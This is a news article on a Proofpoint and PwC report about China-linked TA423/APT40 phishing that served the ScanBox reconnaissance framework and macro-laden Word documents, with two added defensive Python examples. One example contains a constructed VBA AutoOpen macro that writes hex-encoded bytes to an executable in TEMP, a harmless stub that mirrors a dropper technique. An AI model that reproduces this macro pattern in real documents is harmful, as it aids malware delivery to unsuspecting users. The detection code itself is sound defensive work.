China-linked APT40 used ScanBox Framework in long-running spy campaign (Security Affairs)

Experts have uncovered a cyber espionage campaign by a China-linked APT group targeting several entities in the South China Sea.

Proofpoint’s Threat Research team has uncovered a cyber espionage campaign targeting entities across the globe, orchestrated by a China-linked threat actor. The campaign targeted entities in Australia, Malaysia and Europe, as well as organizations operating in the South China Sea.

Proofpoint analyzed the campaign with the help of PwC threat intelligence researchers.

The campaign was active from April to June 2022; during that period the threat actor was observed serving the ScanBox JavaScript reconnaissance framework to visitors of a rogue Australian news website.

Researchers attribute the campaign to the China-linked APT group tracked as TA423/Red Ladon.

TA423 is a China-linked cyber espionage group that has been active since 2013. It focuses on political events in the Asia-Pacific region, particularly the South China Sea. Over the years, the group has hit defense contractors, manufacturers, universities, government agencies, law firms involved in diplomatic disputes, and foreign companies involved in Australasian politics or operations in the South China Sea.

“The joint efforts of Proofpoint and PwC researchers provide a moderate confidence assessment that recent campaigns targeting the federal government, energy, and manufacturing sectors globally may represent recent efforts by TA423/Red Ladon.” read the report published by the experts.

“The activity that overlaps with this threat actor has been publicly referred to in government indictments as ‘APT40’ and ‘Leviathan’.”

In June 2021, the US Department of Justice (DoJ) indicted four members of the China-linked cyber espionage group APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan) for hacking into dozens of government organizations, private companies and universities around the world between 2011 and 2018.

Recent ScanBox-related phishing campaigns were conducted between April 2022 and June 2022 and primarily targeted Australian local and federal government agencies, Australian news media companies and global heavy industry manufacturers who service wind turbine fleets in the South China Sea.


The phishing messages originated from Gmail and Outlook email addresses likely created by the threat actor and used multiple subject lines, including “Sick leave”, “Looking for users” and “Request for cooperation”. With the attacker posing as an employee of the fictitious media publication “Australian Morning News”, the messages attempt to trick recipients into visiting a link to a rogue domain that served the ScanBox framework.

“The malicious URLs provided in the emails also appear to use custom values for each target, although they all redirect to the same page and serve the same malicious payload. In one instance, the threat actor was observed adding the URI extension “?p=23-<##>”. It appears that p=23 specifies the value of the landing page the user is redirected to, while the number string following it, e.g. the “11” in “?p=23-11”, appears to be a unique identifier for each recipient.” continues the report. “Proofpoint had also observed vanity URLs and separate URL redirect destinations for each target, in TA423’s previous campaigns in March 2022.”
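The per-recipient tagging described above is something a defender can hunt for in web proxy or mail-gateway logs. The following is an added example, not code from Proofpoint, PwC or the report: it parses constructed proxy log lines (the hostname news.example.invalid and the five-column log layout are placeholders, since the report does not name the rogue domain) and groups hits on the ?p=23-<id> landing page by the recipient identifier carried in the URL.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed proxy log lines for illustration (not real telemetry). The
# hostname news.example.invalid is a placeholder; the report does not name the
# rogue domain. Layout: timestamp client-ip method url status.
SAMPLE_LOG = """\
2022-05-02T09:14:03Z 10.1.4.22 GET http://news.example.invalid/?p=23-11 200
2022-05-02T09:16:41Z 10.1.4.37 GET http://news.example.invalid/?p=23-14 200
2022-05-02T09:20:10Z 10.1.4.22 GET http://news.example.invalid/wp-content/x.js 200
2022-05-02T09:22:55Z 10.1.5.8 GET http://news.example.invalid/?p=23-11 200
2022-05-02T10:01:00Z 10.1.4.90 GET http://intranet.example.invalid/?p=42 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+)$")
# "23-11": landing-page value, then the per-recipient number the report describes.
RECIPIENT_RE = re.compile(r"^(\d+)-(\d+)$")


def parse_recipient_tag(url):
    """Return (page, recipient_id) for a URL whose p= value is <page>-<id>, else None."""
    for value in parse_qs(urlparse(url).query).get("p", []):
        m = RECIPIENT_RE.match(value)
        if m:
            return int(m.group(1)), int(m.group(2))
    return None


def find_targeted_visits(log_text, landing_page=23):
    """Map each recipient identifier to the (timestamp, client, host) visits that carried it."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected five-column layout; skip rather than guess
        ts, client, _method, url, _status = m.groups()
        tag = parse_recipient_tag(url)
        if tag is None or tag[0] != landing_page:
            continue  # ordinary WordPress-style ?p= values (e.g. p=42) are not flagged
        hits.setdefault(tag[1], []).append((ts, client, urlparse(url).hostname))
    return hits


if __name__ == "__main__":
    for rid, visits in sorted(find_targeted_visits(SAMPLE_LOG).items()):
        print(f"recipient {rid}: {visits}")
```

The same identifier appearing from two client addresses (id 11 in the constructed sample) deserves a closer look: it can mean the phishing link was forwarded internally, or that one recipient opened it from two hosts. Real proxy logs will need a different LOG_RE; the part worth keeping is the query-string parsing, and landing_page is a parameter because a plain ?p=<number> is also what an unmodified WordPress site emits, so only the <page>-<id> form is flagged.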

ScanBox is a JavaScript-based reconnaissance framework; its code can be delivered to the visitor's browser either as a single block or as a modular, plugin-based set of scripts.

ScanBox is used to profile victims and harvest information that informs the delivery of next-stage payloads. It has been used by several China-linked APT groups in the past ([1], [2], [3], [4], [5]), including Stone Panda, TA413 and LuckyMouse.

In this campaign ScanBox served several plugins to targets; the most recently added one checks whether Kaspersky Internet Security (KIS) is installed on the victim machine.

The researchers also correlated this campaign with previous campaigns orchestrated by the TA423 APT group that leveraged RTF template injection.

RTF documents were used to drop the first-stage downloader on victims' systems; the researchers observed that the RTF template injection URL returned a weaponized Microsoft Word document.

“The RTF template injection URL returned a Microsoft Word document loaded with macros. The macro contains a series of hard-coded hexadecimal bytes stored as strings. These strings are reassembled by the macro and converted into two files, a PE, and a DLL, which are registered on the victim host and executed. The macro also makes a URL request apparently to return an “UpdateConfig” value that can be used by the final installed payload.” the report continues.
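As an added example covering both the RTF template injection described above and the hex-string macro in the quoted report (my code, not the actor's and not Proofpoint's): it pulls the remote template URL out of a constructed RTF fragment, reassembles the hexadecimal string literals of a constructed VBA macro into bytes, and checks whether the result carries a valid MZ/PE header. The URL template.example.invalid, the macro text and the 68-byte PE stub are all constructed for the example.

```python
import re

# Constructed RTF fragment (not a real sample). {\*\template <url>} is the
# control word RTF template injection abuses to fetch a remote template.
SAMPLE_RTF = rb"{\rtf1\ansi{\*\template http://template.example.invalid/doc.dotm}\pard Quarterly report\par}"

# Constructed 68-byte MZ/PE stub: 'MZ', zero padding, e_lfanew = 0x40 at
# offset 0x3C, then the 'PE\0\0' signature. Not a real executable.
_PE_HEX = "4D5A" + "00" * 58 + "40000000" + "50450000"

# Constructed VBA fragment (not the actor's macro) hiding the stub as
# hexadecimal strings that are concatenated at runtime.
SAMPLE_MACRO = f'''
Sub AutoOpen()
    Dim h1 As String, h2 As String, h3 As String
    h1 = "{_PE_HEX[:48]}"
    h2 = "{_PE_HEX[48:96]}"
    h3 = "{_PE_HEX[96:]}"
    WriteBytes Environ("TEMP") & "\\svc.exe", h1 & h2 & h3
End Sub
'''

TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s+([^}]+)\}")
# String literals of at least 8 hex digits; shorter ones are usually ordinary text.
HEX_STRING_RE = re.compile(r'"([0-9A-Fa-f]{8,})"')


def extract_template_url(rtf_bytes):
    """Return the remote template URL referenced by an RTF blob, or None."""
    m = TEMPLATE_RE.search(rtf_bytes)
    return m.group(1).decode("ascii", "replace").strip() if m else None


def reassemble_hex_payload(macro_text):
    """Concatenate hex string literals in source order and decode them to bytes."""
    chunks = [c for c in HEX_STRING_RE.findall(macro_text) if len(c) % 2 == 0]
    return bytes.fromhex("".join(chunks))


def looks_like_pe(blob):
    """True if blob has an MZ header whose e_lfanew points at a PE signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


if __name__ == "__main__":
    print("template URL:", extract_template_url(SAMPLE_RTF))
    payload = reassemble_hex_payload(SAMPLE_MACRO)
    print(f"reassembled {len(payload)} bytes, PE header valid: {looks_like_pe(payload)}")
```

Two caveats for real samples. A macro may concatenate its strings in an order other than their appearance in the source, so a failed PE check means following the macro's actual concatenation rather than assuming source order; and RTF writers can split the template URL with \'xx escapes or \u sequences, which this regex does not unescape, so a missing match is not proof of absence.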

Proofpoint researchers conclude that this latest ScanBox campaign is part of a larger cyber espionage operation conducted by APT40 since March 2021.


Pierluigi Paganini

